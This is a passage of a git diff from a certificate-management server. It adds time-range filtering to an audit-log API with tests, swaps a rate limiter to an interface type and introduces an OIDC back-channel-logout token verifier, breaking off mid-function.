Postgres VM will have different query plans for the 10K-cert
|
||||||
|
scan. The captured numbers translate directionally but the
|
||||||
|
absolute ceiling is workload-specific — see the operator-tune
|
||||||
|
ladder above for production sizing.
|
||||||
|
- **Pull-only deployment model.** Agent CSR submit, work-poll, and
|
||||||
|
deploy-verify paths are intentionally out of scope. The heartbeat
|
||||||
|
storm exercises the highest-frequency call on a typical fleet;
|
||||||
|
the work-poll path runs at the same cadence but is cheap (empty
|
||||||
|
set returned 99% of the time).
|
||||||
|
|
||||||
|
## Profiling production
|
||||||
|
|
||||||
|
When the above ladder doesn't fit your shape, profile against your
|
||||||
|
specific workload. The
|
||||||
|
[performance-baselines.md](performance-baselines.md) runbook has
|
||||||
|
single-endpoint, inventory-walk, and renewal-scan recipes you can
|
||||||
|
adapt.
|
||||||
|
|
||||||
|
## Related reading
|
||||||
|
|
||||||
|
- [`docs/operator/performance-baselines.md`](performance-baselines.md) —
|
||||||
|
per-endpoint baselines + how to re-baseline after upgrades.
|
||||||
|
- [`docs/operator/runbooks/postgres-backup.md`](runbooks/postgres-backup.md) —
|
||||||
|
Postgres-side backup discipline (necessary precondition for any
|
||||||
|
scale tuning).
|
||||||
|
- [`deploy/ENVIRONMENTS.md`](../../deploy/ENVIRONMENTS.md) — the
|
||||||
|
full env-var inventory the values referenced above come from.
|
||||||
@@ -4,12 +4,12 @@
|
|||||||
<!-- Re-run after adding or removing any t.Skip(). CI guard: -->
|
<!-- Re-run after adding or removing any t.Skip(). CI guard: -->
|
||||||
<!-- scripts/ci-guards/skip-inventory-drift.sh -->
|
<!-- scripts/ci-guards/skip-inventory-drift.sh -->
|
||||||
|
|
||||||
> Last reviewed: 2026-05-13
|
> Last reviewed: 2026-05-14
|
||||||
|
|
||||||
## Summary
|
## Summary
|
||||||
|
|
||||||
- Total t.Skip sites: **142**
|
- Total t.Skip sites: **144**
|
||||||
- testing.Short() guards: **76** (these gate behind `go test -short`)
|
- testing.Short() guards: **78** (these gate behind `go test -short`)
|
||||||
|
|
||||||
Re-run inventory with: `./scripts/skip-inventory.sh`.
|
Re-run inventory with: `./scripts/skip-inventory.sh`.
|
||||||
|
|
||||||
@@ -114,7 +114,7 @@ Re-run inventory with: `./scripts/skip-inventory.sh`.
|
|||||||
|
|
||||||
### `internal/ciparity`
|
### `internal/ciparity`
|
||||||
|
|
||||||
- `internal/ciparity/surface_parity_test.go:97` — // readFileOrSkip reads a file; on ENOENT, calls t.Skipf rather than
|
- `internal/ciparity/surface_parity_test.go:113` — // readFileOrSkip reads a file; on ENOENT, calls t.Skipf rather than
|
||||||
|
|
||||||
### `internal/connector/issuer/acme`
|
### `internal/connector/issuer/acme`
|
||||||
|
|
||||||
@@ -156,6 +156,8 @@ Re-run inventory with: `./scripts/skip-inventory.sh`.
|
|||||||
|
|
||||||
### `internal/ratelimit`
|
### `internal/ratelimit`
|
||||||
|
|
||||||
|
- `internal/ratelimit/equivalence_test.go:80` — t.Skip("race-style test under -short")
|
||||||
|
- `internal/ratelimit/equivalence_test.go:88` — t.Skip("postgres equivalence tests require testcontainers; skipped under -short")
|
||||||
- `internal/ratelimit/sliding_window_test.go:146` — t.Skip("race-style test under -short")
|
- `internal/ratelimit/sliding_window_test.go:146` — t.Skip("race-style test under -short")
|
||||||
|
|
||||||
### `internal/repository/postgres`
|
### `internal/repository/postgres`
|
||||||
|
|||||||
@@ -28,6 +28,18 @@ type AuditService interface {
|
|||||||
// empty string returns all categories. Used by the auditor role
|
// empty string returns all categories. Used by the auditor role
|
||||||
// (filtered to "auth" via /v1/audit?category=auth).
|
// (filtered to "auth" via /v1/audit?category=auth).
|
||||||
ListAuditEventsByCategory(ctx context.Context, eventCategory string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
ListAuditEventsByCategory(ctx context.Context, eventCategory string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
||||||
|
// ListAuditEventsByFilter (P-H2 closure, frontend-design-audit
|
||||||
|
// 2026-05-14) returns audit rows constrained by an optional time
|
||||||
|
// range AND optional category. Zero time.Time on either bound
|
||||||
|
// disables that bound. The repository already pushes the
|
||||||
|
// predicate into SQL (timestamp >=/<= since/until); this method
|
||||||
|
// just threads handler-parsed `since` / `until` query params
|
||||||
|
// through to the filter. Frontend (AuditPage) drops the pre-P-H2
|
||||||
|
// client-side time filter ("fetches the entire event window,
|
||||||
|
// throws 99% away in JS") and sends since/until directly. MCP's
|
||||||
|
// certctl_audit_list_with_category tool already advertised these
|
||||||
|
// params; this closure makes that advertised contract truthful.
|
||||||
|
ListAuditEventsByFilter(ctx context.Context, since, until time.Time, eventCategory string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
||||||
// ExportEventsByFilter returns audit events matching a
|
// ExportEventsByFilter returns audit events matching a
|
||||||
// (from, to, eventCategory) filter, capped at maxRows. Audit
|
// (from, to, eventCategory) filter, capped at maxRows. Audit
|
||||||
// 2026-05-10 HIGH-11 closure — backs the new
|
// 2026-05-10 HIGH-11 closure — backs the new
|
||||||
@@ -53,12 +65,29 @@ func NewAuditHandler(svc AuditService) AuditHandler {
|
|||||||
}
|
}
|
||||||
|
|
||||||
// ListAuditEvents lists audit events.
|
// ListAuditEvents lists audit events.
|
||||||
// GET /api/v1/audit?page=1&per_page=50&category=auth
|
// GET /api/v1/audit?page=1&per_page=50&category=auth&since=<RFC3339>&until=<RFC3339>
|
||||||
//
|
//
|
||||||
// Bundle 1 Phase 8 adds the optional `category` query parameter for
|
// Bundle 1 Phase 8 added the optional `category` query parameter for
|
||||||
// auditor-role filtering. Allowed values: cert_lifecycle, auth, config.
|
// auditor-role filtering. Allowed values: cert_lifecycle, auth, config.
|
||||||
// Unknown values surface 400 so misuse is caught loud (instead of
|
// Unknown values surface 400 so misuse is caught loud (instead of
|
||||||
// silently returning all rows).
|
// silently returning all rows).
|
||||||
|
//
|
||||||
|
// P-H2 closure (frontend-design-audit 2026-05-14) adds the optional
|
||||||
|
// `since` / `until` time-range query parameters. Both accept RFC3339
|
||||||
|
// (e.g. "2026-04-01T00:00:00Z"). Either bound can be omitted to leave
|
||||||
|
// that side open-ended. The repository already pushes the timestamp
|
||||||
|
// predicate into the SQL query, and migration 000032's
|
||||||
|
// (event_category, timestamp DESC) composite index makes the
|
||||||
|
// predicate hit an index scan rather than a sequential scan.
|
||||||
|
//
|
||||||
|
// Note on naming: this endpoint uses `since` / `until` to match the
|
||||||
|
// existing MCP `certctl_audit_list_with_category` tool's published
|
||||||
|
// contract (internal/mcp/tools_audit_fix.go:174) and the audit-text
|
||||||
|
// framing of the P-H2 finding. The sibling /api/v1/audit/export
|
||||||
|
// endpoint uses `from` / `to` for compliance-window semantics
|
||||||
|
// (required, ≤ 90-day range, NDJSON streaming); the two endpoints
|
||||||
|
// share data but have different param semantics and the names were
|
||||||
|
// chosen to reflect that.
|
||||||
func (h AuditHandler) ListAuditEvents(w http.ResponseWriter, r *http.Request) {
|
func (h AuditHandler) ListAuditEvents(w http.ResponseWriter, r *http.Request) {
|
||||||
if r.Method != http.MethodGet {
|
if r.Method != http.MethodGet {
|
||||||
Error(w, http.StatusMethodNotAllowed, "Method not allowed")
|
Error(w, http.StatusMethodNotAllowed, "Method not allowed")
|
||||||
@@ -93,16 +122,39 @@ func (h AuditHandler) ListAuditEvents(w http.ResponseWriter, r *http.Request) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
var (
|
// P-H2: optional time-range bounds. RFC3339 parse with explicit
|
||||||
events []domain.AuditEvent
|
// 400 on malformed input — silently dropping a malformed `since`
|
||||||
total int64
|
// would be worse than rejecting it (operator gets unfiltered
|
||||||
err error
|
// results when they thought they were filtering).
|
||||||
)
|
var since, until time.Time
|
||||||
if category != "" {
|
if s := query.Get("since"); s != "" {
|
||||||
events, total, err = h.svc.ListAuditEventsByCategory(r.Context(), category, page, perPage)
|
parsed, err := time.Parse(time.RFC3339, s)
|
||||||
} else {
|
if err != nil {
|
||||||
events, total, err = h.svc.ListAuditEvents(r.Context(), page, perPage)
|
ErrorWithRequestID(w, http.StatusBadRequest,
|
||||||
|
"`since` must be RFC3339 (e.g. 2026-04-01T00:00:00Z)",
|
||||||
|
requestID)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
since = parsed
|
||||||
}
|
}
|
||||||
|
if u := query.Get("until"); u != "" {
|
||||||
|
parsed, err := time.Parse(time.RFC3339, u)
|
||||||
|
if err != nil {
|
||||||
|
ErrorWithRequestID(w, http.StatusBadRequest,
|
||||||
|
"`until` must be RFC3339 (e.g. 2026-05-01T00:00:00Z)",
|
||||||
|
requestID)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
until = parsed
|
||||||
|
}
|
||||||
|
if !since.IsZero() && !until.IsZero() && !until.After(since) {
|
||||||
|
ErrorWithRequestID(w, http.StatusBadRequest,
|
||||||
|
"`until` must be after `since`",
|
||||||
|
requestID)
|
||||||
|
return
|
||||||
|
}
|
||||||
|
|
||||||
|
events, total, err := h.svc.ListAuditEventsByFilter(r.Context(), since, until, category, page, perPage)
|
||||||
if err != nil {
|
if err != nil {
|
||||||
ErrorWithRequestID(w, http.StatusInternalServerError, "Failed to list audit events", requestID)
|
ErrorWithRequestID(w, http.StatusInternalServerError, "Failed to list audit events", requestID)
|
||||||
return
|
return
|
||||||
|
|||||||
@@ -15,13 +15,18 @@ import (
|
|||||||
|
|
||||||
// mockAuditService implements AuditService for testing.
|
// mockAuditService implements AuditService for testing.
|
||||||
type mockAuditService struct {
|
type mockAuditService struct {
|
||||||
listFunc func(page, perPage int) ([]domain.AuditEvent, int64, error)
|
listFunc func(page, perPage int) ([]domain.AuditEvent, int64, error)
|
||||||
listByCatFunc func(category string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
listByCatFunc func(category string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
||||||
getFunc func(id string) (*domain.AuditEvent, error)
|
listByFiltFunc func(since, until time.Time, category string, page, perPage int) ([]domain.AuditEvent, int64, error)
|
||||||
|
getFunc func(id string) (*domain.AuditEvent, error)
|
||||||
// HIGH-11 self-audit trace — last RecordEventWithCategory call.
|
// HIGH-11 self-audit trace — last RecordEventWithCategory call.
|
||||||
lastAuditActor string
|
lastAuditActor string
|
||||||
lastAuditAction string
|
lastAuditAction string
|
||||||
lastAuditCategory string
|
lastAuditCategory string
|
||||||
|
// P-H2 trace — last ListAuditEventsByFilter args.
|
||||||
|
lastFilterSince time.Time
|
||||||
|
lastFilterUntil time.Time
|
||||||
|
lastFilterCategory string
|
||||||
}
|
}
|
||||||
|
|
||||||
func (m *mockAuditService) ListAuditEvents(_ context.Context, page, perPage int) ([]domain.AuditEvent, int64, error) {
|
func (m *mockAuditService) ListAuditEvents(_ context.Context, page, perPage int) ([]domain.AuditEvent, int64, error) {
|
||||||
@@ -41,6 +46,27 @@ func (m *mockAuditService) ListAuditEventsByCategory(_ context.Context, category
|
|||||||
return nil, 0, nil
|
return nil, 0, nil
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// ListAuditEventsByFilter satisfies the P-H2 interface extension. The
|
||||||
|
// test fixture remembers the (since, until, category) tuple so
|
||||||
|
// per-subtest assertions can pin that the handler threaded the
|
||||||
|
// query-string params through correctly. Falls back to listFunc /
|
||||||
|
// listByCatFunc so existing tests don't need to set listByFiltFunc.
|
||||||
|
func (m *mockAuditService) ListAuditEventsByFilter(_ context.Context, since, until time.Time, category string, page, perPage int) ([]domain.AuditEvent, int64, error) {
|
||||||
|
m.lastFilterSince = since
|
||||||
|
m.lastFilterUntil = until
|
||||||
|
m.lastFilterCategory = category
|
||||||
|
if m.listByFiltFunc != nil {
|
||||||
|
return m.listByFiltFunc(since, until, category, page, perPage)
|
||||||
|
}
|
||||||
|
if category != "" && m.listByCatFunc != nil {
|
||||||
|
return m.listByCatFunc(category, page, perPage)
|
||||||
|
}
|
||||||
|
if m.listFunc != nil {
|
||||||
|
return m.listFunc(page, perPage)
|
||||||
|
}
|
||||||
|
return nil, 0, nil
|
||||||
|
}
|
||||||
|
|
||||||
func (m *mockAuditService) GetAuditEvent(_ context.Context, id string) (*domain.AuditEvent, error) {
|
func (m *mockAuditService) GetAuditEvent(_ context.Context, id string) (*domain.AuditEvent, error) {
|
||||||
if m.getFunc != nil {
|
if m.getFunc != nil {
|
||||||
return m.getFunc(id)
|
return m.getFunc(id)
|
||||||
@@ -325,6 +351,153 @@ func TestListAuditEvents_MethodNotAllowed(t *testing.T) {
|
|||||||
}
|
}
|
||||||
}
|
}
|
||||||
|
|
||||||
|
// ── P-H2 closure (since / until time-range query params) ───────────
|
||||||
|
|
||||||
|
// TestListAuditEvents_WithSinceUntil pins the happy path — both bounds
|
||||||
|
// supplied in RFC3339, mock observes them threaded into the service
|
||||||
|
// call, response is 200.
|
||||||
|
func TestListAuditEvents_WithSinceUntil(t *testing.T) {
|
||||||
|
since := time.Date(2026, 4, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
until := time.Date(2026, 5, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
|
||||||
|
mockSvc := &mockAuditService{
|
||||||
|
listByFiltFunc: func(s, u time.Time, _ string, _, _ int) ([]domain.AuditEvent, int64, error) {
|
||||||
|
if !s.Equal(since) {
|
||||||
|
t.Errorf("service since = %v, want %v", s, since)
|
||||||
|
}
|
||||||
|
if !u.Equal(until) {
|
||||||
|
t.Errorf("service until = %v, want %v", u, until)
|
||||||
|
}
|
||||||
|
return []domain.AuditEvent{}, 0, nil
|
||||||
|
},
|
||||||
|
}
|
||||||
|
handler := NewAuditHandler(mockSvc)
|
||||||
|
|
||||||
|
url := "/api/v1/audit?since=" + since.Format(time.RFC3339) + "&until=" + until.Format(time.RFC3339)
|
||||||
|
req, err := http.NewRequest(http.MethodGet, url, nil)
|
||||||
|
if err != nil {
|
||||||
|
t.Fatalf("NewRequest failed: %v", err)
|
||||||
|
}
|
||||||
|
ctx := context.WithValue(req.Context(), middleware.RequestIDKey{}, "test-req-id")
|
||||||
|
req = req.WithContext(ctx)
|
||||||
|
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
handler.ListAuditEvents(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d, want 200; body=%s", w.Code, w.Body.String())
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterSince.Equal(since) {
|
||||||
|
t.Errorf("mock recorded since = %v, want %v", mockSvc.lastFilterSince, since)
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterUntil.Equal(until) {
|
||||||
|
t.Errorf("mock recorded until = %v, want %v", mockSvc.lastFilterUntil, until)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestListAuditEvents_SinceOnly pins one-sided bound — only `since`
|
||||||
|
// supplied, `until` stays zero. Closure of "operator filters to events
|
||||||
|
// from the last hour" via since=<now-1h>.
|
||||||
|
func TestListAuditEvents_SinceOnly(t *testing.T) {
|
||||||
|
since := time.Date(2026, 4, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
mockSvc := &mockAuditService{}
|
||||||
|
handler := NewAuditHandler(mockSvc)
|
||||||
|
|
||||||
|
req, _ := http.NewRequest(http.MethodGet, "/api/v1/audit?since="+since.Format(time.RFC3339), nil)
|
||||||
|
ctx := context.WithValue(req.Context(), middleware.RequestIDKey{}, "test-req-id")
|
||||||
|
req = req.WithContext(ctx)
|
||||||
|
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
handler.ListAuditEvents(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d, want 200; body=%s", w.Code, w.Body.String())
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterSince.Equal(since) {
|
||||||
|
t.Errorf("since = %v, want %v", mockSvc.lastFilterSince, since)
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterUntil.IsZero() {
|
||||||
|
t.Errorf("until = %v, want zero (open-ended)", mockSvc.lastFilterUntil)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestListAuditEvents_InvalidSince pins the parse-error 400 path.
|
||||||
|
// Silently dropping a malformed since would return ALL rows when the
|
||||||
|
// operator thought they were filtering — worse than rejecting.
|
||||||
|
func TestListAuditEvents_InvalidSince(t *testing.T) {
|
||||||
|
mockSvc := &mockAuditService{}
|
||||||
|
handler := NewAuditHandler(mockSvc)
|
||||||
|
|
||||||
|
req, _ := http.NewRequest(http.MethodGet, "/api/v1/audit?since=not-a-date", nil)
|
||||||
|
ctx := context.WithValue(req.Context(), middleware.RequestIDKey{}, "test-req-id")
|
||||||
|
req = req.WithContext(ctx)
|
||||||
|
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
handler.ListAuditEvents(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusBadRequest {
|
||||||
|
t.Errorf("status = %d, want 400; body=%s", w.Code, w.Body.String())
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterSince.IsZero() {
|
||||||
|
t.Error("service should NOT have been called on bad since")
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestListAuditEvents_UntilBeforeSince pins the order assertion — a
|
||||||
|
// reversed range surfaces 400, doesn't quietly return empty.
|
||||||
|
func TestListAuditEvents_UntilBeforeSince(t *testing.T) {
|
||||||
|
since := time.Date(2026, 5, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
until := time.Date(2026, 4, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
|
||||||
|
mockSvc := &mockAuditService{}
|
||||||
|
handler := NewAuditHandler(mockSvc)
|
||||||
|
|
||||||
|
url := "/api/v1/audit?since=" + since.Format(time.RFC3339) + "&until=" + until.Format(time.RFC3339)
|
||||||
|
req, _ := http.NewRequest(http.MethodGet, url, nil)
|
||||||
|
ctx := context.WithValue(req.Context(), middleware.RequestIDKey{}, "test-req-id")
|
||||||
|
req = req.WithContext(ctx)
|
||||||
|
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
handler.ListAuditEvents(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusBadRequest {
|
||||||
|
t.Errorf("status = %d, want 400; body=%s", w.Code, w.Body.String())
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// TestListAuditEvents_TimeRangePlusCategory pins that since/until
|
||||||
|
// compose with category (the auditor-role narrow-to-auth use case
|
||||||
|
// extended to "auth events from yesterday" without a separate
|
||||||
|
// endpoint).
|
||||||
|
func TestListAuditEvents_TimeRangePlusCategory(t *testing.T) {
|
||||||
|
since := time.Date(2026, 4, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
until := time.Date(2026, 5, 1, 0, 0, 0, 0, time.UTC)
|
||||||
|
|
||||||
|
mockSvc := &mockAuditService{}
|
||||||
|
handler := NewAuditHandler(mockSvc)
|
||||||
|
|
||||||
|
url := "/api/v1/audit?category=auth&since=" + since.Format(time.RFC3339) + "&until=" + until.Format(time.RFC3339)
|
||||||
|
req, _ := http.NewRequest(http.MethodGet, url, nil)
|
||||||
|
ctx := context.WithValue(req.Context(), middleware.RequestIDKey{}, "test-req-id")
|
||||||
|
req = req.WithContext(ctx)
|
||||||
|
|
||||||
|
w := httptest.NewRecorder()
|
||||||
|
handler.ListAuditEvents(w, req)
|
||||||
|
|
||||||
|
if w.Code != http.StatusOK {
|
||||||
|
t.Errorf("status = %d, want 200; body=%s", w.Code, w.Body.String())
|
||||||
|
}
|
||||||
|
if mockSvc.lastFilterCategory != "auth" {
|
||||||
|
t.Errorf("category = %q, want auth", mockSvc.lastFilterCategory)
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterSince.Equal(since) {
|
||||||
|
t.Errorf("since = %v, want %v", mockSvc.lastFilterSince, since)
|
||||||
|
}
|
||||||
|
if !mockSvc.lastFilterUntil.Equal(until) {
|
||||||
|
t.Errorf("until = %v, want %v", mockSvc.lastFilterUntil, until)
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
func TestGetAuditEvent_Success(t *testing.T) {
|
func TestGetAuditEvent_Success(t *testing.T) {
|
||||||
event := &domain.AuditEvent{
|
event := &domain.AuditEvent{
|
||||||
ID: "ev-123",
|
ID: "ev-123",
|
||||||
|
|||||||
@@ -78,7 +78,7 @@ type AuthBreakglassHandler struct {
|
|||||||
// nil-safe: when unset, the handler skips the limiter check and
|
// nil-safe: when unset, the handler skips the limiter check and
|
||||||
// relies on the service-layer Argon2id lockout. Production deploys
|
// relies on the service-layer Argon2id lockout. Production deploys
|
||||||
// MUST set this via SetLoginRateLimiter.
|
// MUST set this via SetLoginRateLimiter.
|
||||||
loginLimiter *ratelimit.SlidingWindowLimiter
|
loginLimiter ratelimit.Limiter
|
||||||
}
|
}
|
||||||
|
|
||||||
// NewAuthBreakglassHandler constructs the handler.
|
// NewAuthBreakglassHandler constructs the handler.
|
||||||
@@ -89,7 +89,7 @@ func NewAuthBreakglassHandler(svc BreakglassService, cookieAttrs SessionCookieAt
|
|||||||
// SetLoginRateLimiter wires the per-source-IP rate limiter the Login
|
// SetLoginRateLimiter wires the per-source-IP rate limiter the Login
|
||||||
// handler enforces. Bundle 5 closure (S1) — see the AuthBreakglassHandler
|
// handler enforces. Bundle 5 closure (S1) — see the AuthBreakglassHandler
|
||||||
// type docstring for the full rationale.
|
// type docstring for the full rationale.
|
||||||
func (h *AuthBreakglassHandler) SetLoginRateLimiter(l *ratelimit.SlidingWindowLimiter) {
|
func (h *AuthBreakglassHandler) SetLoginRateLimiter(l ratelimit.Limiter) {
|
||||||
h.loginLimiter = l
|
h.loginLimiter = l
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|||||||
File diff suppressed because it is too large
Load Diff
@@ -0,0 +1,225 @@
|
|||||||
|
// Copyright 2026 certctl LLC. All rights reserved.
|
||||||
|
// SPDX-License-Identifier: BUSL-1.1
|
||||||
|
|
||||||
|
package handler
|
||||||
|
|
||||||
|
import (
|
||||||
|
"context"
|
||||||
|
"encoding/base64"
|
||||||
|
"encoding/json"
|
||||||
|
"errors"
|
||||||
|
"fmt"
|
||||||
|
"strings"
|
||||||
|
"time"
|
||||||
|
|
||||||
|
gooidc "github.com/coreos/go-oidc/v3/oidc"
|
||||||
|
|
||||||
|
oidcdomain "github.com/certctl-io/certctl/internal/auth/oidc/domain"
|
||||||
|
"github.com/certctl-io/certctl/internal/repository"
|
||||||
|
)
|
||||||
|
|
||||||
|
// Phase 9 ARCH-M2 closure Sprint 11 (2026-05-14): extracted from
|
||||||
|
// internal/api/handler/auth_session_oidc.go via the Option B
|
||||||
|
// sibling-file pattern.
|
||||||
|
//
|
||||||
|
// This file holds the DefaultBCLVerifier — the default
|
||||||
|
// implementation of the BackChannelLogoutVerifier interface
|
||||||
|
// declared in auth_session_oidc.go. Verifies an OIDC
|
||||||
|
// back-channel-logout token per OpenID Connect Back-Channel
|
||||||
|
// Logout 1.0 §2.6: enforces the events claim, iat window,
|
||||||
|
// algorithm allowlist, audience match against the provider's
|
||||||
|
// configured client ID, and decodes sub/sid/jti for the
|
||||||
|
// revocation lookup.
|
||||||
|
//
|
||||||
|
// External callers:
|
||||||
|
// - cmd/server/main.go wires NewDefaultBCLVerifier(...) +
|
||||||
|
// DefaultBCLVerifierMaxAge into the AuthSessionOIDCHandler
|
||||||
|
// via WithBCLReplayConsumer.
|
||||||
|
//
|
||||||
|
// peekIssuer (unexported) is consumed only by Verify so it moves
|
||||||
|
// with the verifier. The go-oidc/v3 client is the underlying JWS
|
||||||
|
// verification + IdP-key-cache; everything else here is policy.
|
||||||
|
|
||||||
|
// =============================================================================
|
||||||
|
// Default BackChannelLogoutVerifier — wraps go-oidc/v3.
|
||||||
|
// =============================================================================
|
||||||
|
|
||||||
|
// DefaultBCLVerifierMaxAge is the default iat-freshness skew window
|
||||||
|
// (60 seconds; tokens older or newer than this are rejected). Override
|
||||||
|
// per-server via CERTCTL_OIDC_BCL_MAX_AGE_SECONDS. Audit 2026-05-10
|
||||||
|
// HIGH-3 closure.
|
||||||
|
const DefaultBCLVerifierMaxAge = 60 * time.Second
|
||||||
|
|
||||||
|
// DefaultBCLVerifier is the production BackChannelLogoutVerifier. It
|
||||||
|
// resolves the IdP by issuer (matched against the OIDCProviderRepository),
|
||||||
|
// fetches the IdP's JWKS via gooidc.Provider, and validates the
|
||||||
|
// logout_token JWT signature + required claims.
|
||||||
|
type DefaultBCLVerifier struct {
|
||||||
|
providerRepo repository.OIDCProviderRepository
|
||||||
|
tenantID string
|
||||||
|
allowedAlgs []string
|
||||||
|
// maxAge is the iat-freshness skew window. Tokens with iat in the
|
||||||
|
// past beyond this OR in the future beyond this are rejected. Set
|
||||||
|
// via WithMaxAge; defaults to DefaultBCLVerifierMaxAge.
|
||||||
|
maxAge time.Duration
|
||||||
|
// nowFn is the clock seam (test injection).
|
||||||
|
nowFn func() time.Time
|
||||||
|
|
||||||
|
// Injectable for tests so unit tests don't hit a real IdP.
|
||||||
|
verifyOverride func(ctx context.Context, providerIssuer, rawIDToken string) (*gooidc.IDToken, error)
|
||||||
|
}
|
||||||
|
|
||||||
|
// NewDefaultBCLVerifier constructs a verifier wired against the given
|
||||||
|
// provider repo + tenant.
|
||||||
|
func NewDefaultBCLVerifier(providerRepo repository.OIDCProviderRepository, tenantID string, allowedAlgs []string) *DefaultBCLVerifier {
|
||||||
|
if len(allowedAlgs) == 0 {
|
||||||
|
allowedAlgs = []string{
|
||||||
|
gooidc.RS256, gooidc.RS512, gooidc.ES256, gooidc.ES384, gooidc.EdDSA,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
return &DefaultBCLVerifier{
|
||||||
|
providerRepo: providerRepo,
|
||||||
|
tenantID: tenantID,
|
||||||
|
allowedAlgs: allowedAlgs,
|
||||||
|
maxAge: DefaultBCLVerifierMaxAge,
|
||||||
|
nowFn: time.Now,
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
// WithMaxAge returns a copy of the verifier with the iat-skew window
|
||||||
|
// overridden. Audit 2026-05-10 HIGH-3 — operator-configurable via
|
||||||
|
// CERTCTL_OIDC_BCL_MAX_AGE_SECONDS at cmd/server/main.go.
|
||||||
|
func (v *DefaultBCLVerifier) WithMaxAge(d time.Duration) *DefaultBCLVerifier {
|
||||||
|
v.maxAge = d
|
||||||
|
return v
|
||||||
|
}
|
||||||
|
|
||||||
|
// Verify implements BackChannelLogoutVerifier.
|
||||||
|
func (v *DefaultBCLVerifier) Verify(ctx context.Context, logoutToken string) (issuer, sub, sid, jti string, iat int64, err error) {
|
||||||
|
// We don't know which provider the logout_token came from until we
|
||||||
|
// peek at the iss claim. Parse-without-verify, look up the matching
|
||||||
|
// provider, then verify against that provider's JWKS.
|
||||||
|
iss, peekErr := peekIssuer(logoutToken)
|
||||||
|
if peekErr != nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("peek issuer: %w", peekErr)
|
||||||
|
}
|
||||||
|
provs, lerr := v.providerRepo.List(ctx, v.tenantID)
|
||||||
|
if lerr != nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("list providers: %w", lerr)
|
||||||
|
}
|
||||||
|
var matched *oidcdomain.OIDCProvider
|
||||||
|
for _, p := range provs {
|
||||||
|
if p.IssuerURL == iss {
|
||||||
|
matched = p
|
||||||
|
break
|
||||||
|
}
|
||||||
|
}
|
||||||
|
if matched == nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("no provider configured for issuer %q", iss)
|
||||||
|
}
|
||||||
|
|
||||||
|
var idToken *gooidc.IDToken
|
||||||
|
if v.verifyOverride != nil {
|
||||||
|
idToken, err = v.verifyOverride(ctx, matched.IssuerURL, logoutToken)
|
||||||
|
} else {
|
||||||
|
provider, perr := gooidc.NewProvider(ctx, matched.IssuerURL)
|
||||||
|
if perr != nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("provider discovery: %w", perr)
|
||||||
|
}
|
||||||
|
verifier := provider.Verifier(&gooidc.Config{
|
||||||
|
ClientID: matched.ClientID,
|
||||||
|
SupportedSigningAlgs: v.allowedAlgs,
|
||||||
|
SkipExpiryCheck: true, // OIDC BCL §2.4 — no exp claim required
|
||||||
|
})
|
||||||
|
idToken, err = verifier.Verify(ctx, logoutToken)
|
||||||
|
}
|
||||||
|
if err != nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("verify: %w", err)
|
||||||
|
}
|
||||||
|
|
||||||
|
// Required claims per spec §2.4.
|
||||||
|
var claims struct {
|
||||||
|
Iss string `json:"iss"`
|
||||||
|
Aud interface{} `json:"aud"`
|
||||||
|
Iat int64 `json:"iat"`
|
||||||
|
Jti string `json:"jti"`
|
||||||
|
Events map[string]interface{} `json:"events"`
|
||||||
|
Sub string `json:"sub"`
|
||||||
|
Sid string `json:"sid"`
|
||||||
|
Nonce string `json:"nonce"`
|
||||||
|
}
|
||||||
|
if cerr := idToken.Claims(&claims); cerr != nil {
|
||||||
|
return "", "", "", "", 0, fmt.Errorf("claims unmarshal: %w", cerr)
|
||||||
|
}
|
||||||
|
if claims.Iat == 0 {
|
||||||
|
return "", "", "", "", 0, errors.New("missing iat claim")
|
||||||
|
}
|
||||||
|
// Audit 2026-05-10 HIGH-3 — iat freshness check. Reject tokens
|
||||||
|
// whose iat is outside the skew window. RFC 9700 §2.7 + the
|
||||||
|
// existing ID-token-path skew tolerance (oidc/service.go:463).
|
||||||
|
maxAge := v.maxAge
|
||||||
|
if maxAge <= 0 {
|
||||||
|
maxAge = DefaultBCLVerifierMaxAge
|
||||||
|
}
|
||||||
|
now := v.nowFn().UTC()
|
||||||
|
iatTime := time.Unix(claims.Iat, 0).UTC()
|
||||||
|
if iatTime.After(now.Add(maxAge)) {
|
